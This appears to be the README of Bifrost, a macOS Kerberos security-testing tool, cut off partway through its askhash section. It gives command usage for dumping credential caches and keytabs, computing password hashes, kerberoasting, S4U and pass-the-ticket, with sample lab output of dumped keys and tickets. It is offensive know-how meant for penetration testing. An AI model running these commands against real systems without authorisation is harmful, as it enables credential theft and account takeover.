Bifrost

  ___         ___                   _   
 (  _`\  _  /'___)                 ( )_ 
 | (_) )(_)| (__  _ __   _     ___ | ,_)
 |  _ <'| || ,__)( '__)/'_`\ /',__)| |  
 | (_) )| || |   | |  ( (_) )\__, \| |_ 
 (____/'(_)(_)   (_)  `\___/'(____/`\__)
                                        

Usage:
./bifrost -action [dump | list | askhash | describe | asktgt | asktgs | s4u | ptt | remove]
For dump action:
    -source [tickets | keytab]
        for keytab, optional -path to specify a keytab
        for tickets, optional -name to specify a ccache entry to dump
For list action:
     no other options are necessary
For askhash action:
    -username a.test -password 'mypassword' -domain DOMAIN.COM
         optionally specify -enctype [aes256 | aes128 | rc4] or get all of them
         optionally specify -bpassword 'base64 of password' in case there might be issues with parsing or special characters
For asktgt action:
    -username a.test -domain DOMAIN.COM
         if using a plaintext password, specify -password 'password'
         if using a hash, specify -enctype [aes256 | aes128 | rc4] -hash [hash_here]
             optionally specify -tgtEnctype [aes256|aes128|rc4] to request a TGT with a specific encryption type
             optionally specify -supportAll false to indicate that you want a TGT to match your hash enctype, otherwise will try to get AES256
         if using a keytab, specify -enctype and -keytab [keytab path] to pull a specific hash from the keytab
             optionally specify -tgtEnctype [aes256|aes128|rc4] to request a TGT with a specific encryption type
             optionally specify -supportAll false to indicate that you want a TGT to match your hash enctype, otherwise will try to get AES256
For describe action:
    -ticket base64KirbiTicket
For asktgs action:
    -ticket [base64 of TGT]
    -service [comma separated list of SPNs]
     optionally specify -connectDomain to connect to a domain other than the one specified in the ticket
     optionally specify -serviceDomain to request a service ticket in a domain other than the one specified in the ticket
     optionally specify -kerberoast true to indicate a request for rc4 instead of aes256
For s4u:
    -ticket [base64 of TGT]
    -targetUser [target user in current domain, or targetuser@domain for a different domain]
    -spn [target SPN] (if this isn't specified, just a forwardable S4U2Self ticket is requested as targetUser)
     optionally specify -connectDomain [domain or host to connect to]
For ptt:
    -ticket [base64 of kirbi ticket]
     optionally specify -name [name] to import the ticket into a specific credential cache
     optionally specify -name new to import the ticket into a new credential cache
For remove:
     for tickets: -source tickets -name [name here] (removes an entire ccache)
     for keytabs: -source keytab -principal [principal name] (removes all entries for that principal)
     for keytabs: optionally specify -name to not use the default keytab
     you can't remove a specific ccache principal entry since it seems to not be implemented in heimdal

Table of Contents

• Overview
• commands
  • list
  • dump
    • tickets
    • keytab
  • askhash
  • asktgt
    • with plaintext
    • with hash
    • with keytab entry
  • describe
  • asktgs
    • different domains
    • kerberoasting
  • s4u
  • ptt
  • remove
    • credential cache
    • keytab entry

Overview

Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. Bifrost compiles into a static library (but you can change that to a dylib if needed), and bifrostconsole is a simple console project that uses the Bifrost library. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target.

Since this needs to be compiled on a Mac, and that might not be easily available to everybody for testing purposes, I've included a compiled version of the console and the library in the "compiled_binaries" folder. Since these are pre-compiled, expect them to be heavily signatured and only usable for personal testing purposes.

list

The -action list command will loop through all of the credential caches in memory and give basic information about each cache and each entry within. It will also identify the default cache with the [*] marker and each other cache with the [+] marker.

spooky:~ lab_admin$ ./bifrost -action list
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 


[*] Principal: lab_admin@LAB.LOCAL
    Name: API:A74E8799-8173-4D1A-8C7D-AFD2D8B003F3
    Issued             Expires                Principal                    Flags
2019-11-13 18:00:20PST    2019-11-14 04:00:20PST    krbtgt/LAB.LOCAL@LAB.LOCAL    (forwardable renewable initial pre-auth )
1970-12-31 16:00:00PST    2019-12-13 18:00:21PST    krb5_ccache_conf_data/kcm-status@X-CACHECONF:    ()

dump

The -action dump command can extract information about keytabs or credential caches based on the flags.

tickets

To dump tickets specifically, use -source tickets. By default, this will only iterate through the default credential cache. The default credential cache can be identified with the -action list command and looking for the cache identified with a [*] marker. To dump a specific credential cache, use the -name [name here] flag.

Each ticket will be described and dumped into a base64 Kirbi format that can then be used for other commands or with other tools on Windows.

spooky:~ lab_admin$ ./bifrost -action dump  -source tickets
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 


Client: lab_admin@LAB.LOCAL
Principal: krbtgt/LAB.LOCAL@LAB.LOCAL
Key enctype: aes256
Key: DUpykxCguZ9JtWML38nygb5Yyhvd1nGvy+MGReD7sXU= (0D4A729310A0B99F49B5630BDFC9F281BE58CA1BDDD671AFCBE30645E0FBB175)
Expires: 2019-11-14 12:00:20 GMT
Flags: forwardable renewable initial pre-auth 
Kirbi:
doIFIDCCBRygBgIEAAA<...snip...>TE9DQUw=


Client: lab_admin@LAB.LOCAL
Principal: krb5_ccache_conf_data/kcm-status@X-CACHECONF:
Key enctype: 0
Key:  ()
Expires: 2019-12-14 02:00:21 GMT
Flags: 
Principal type: kcm-status
Ticket Data: 
a3JiNQAAAAEAAAAA

keytab

To dump keytab keys, use the -source keytab parameter. By default, this will attempt to dump information from the default keytab (/etc/krb5.keytab) which is only readable by root. To specify another keytab, use the -path /path/to/keytab argument.

Each keytab entry will be described and the key will be dumped in base64 and hex.

spooky:~ lab_admin$ ./bifrost -action dump -source keytab -path test
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 

[*] Resolving keytab path
[+] Successfully opened keytab
[+] principal: lab_admin@LAB.LOCAL
    Entry version: 3
    Key enctype: aes256
    Key: 2DE49D76499F89DEA6DFA62D0EA7FEDFD108EC52936740E2450786A92616D1E1
    Timestamp: 2019-11-10 04:58:09 GMT

bash-3.2$ sudo ./bifrost -action dump -source keytab
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 

[*] Resolving default keytab path
[+] Successfully opened keytab
[+] principal: afpserver/LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47@LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47
    Entry version: 2
    Key enctype: aes256
    Key: 75769776DD087E3C951C514F5DB8A8FAC9DF7BF0EC6FA50A8362C456146B833B
    Timestamp: 2018-10-27 03:26:13 GMT
[+] principal: cifs/LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47@LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47
    Entry version: 2
    Key enctype: aes256
    Key: 75769776DD087E3C951C514F5DB8A8FAC9DF7BF0EC6FA50A8362C456146B833B
    Timestamp: 2018-10-27 03:26:13 GMT
    <...snip...>
[+] principal: spooky$@LAB.LOCAL
    Entry version: 2
    Key enctype: rc4
    Key: A12AD40BD124E6A9A14D65504E8EA30A
    Timestamp: 2019-11-14 02:11:20 GMT
[+] principal: spooky$@LAB.LOCAL
    Entry version: 2
    Key enctype: aes256
    Key: C1BF6861A00B35A97483E820863FAD4ED57831D935DBFE2D501727C678503F73
    Timestamp: 2019-11-14 02:11:20 GMT
[+] principal: spooky$@LAB.LOCAL
    Entry version: 2
    Key enctype: aes128
    Key: 1F44A5E5C7919C00F3166A1344D4FFDA

askhash

The -action askhash will compute the necessary hashes used to request TGTs and decrypt responses. This command requires the plaintext password with -password [password here], but if the password contains special characters that might cause issues, you can always supply a base64 encoded version of the password with -bpassword [base64 password here]. You must also supply the -username [username] and -domain fqdn parameters so that the proper salt can be generated.

If you're wanting to get the hashes for a computer$ account, make sure to include the $ in the username. The salt for a computer account is different than the salt for a user account.

spooky: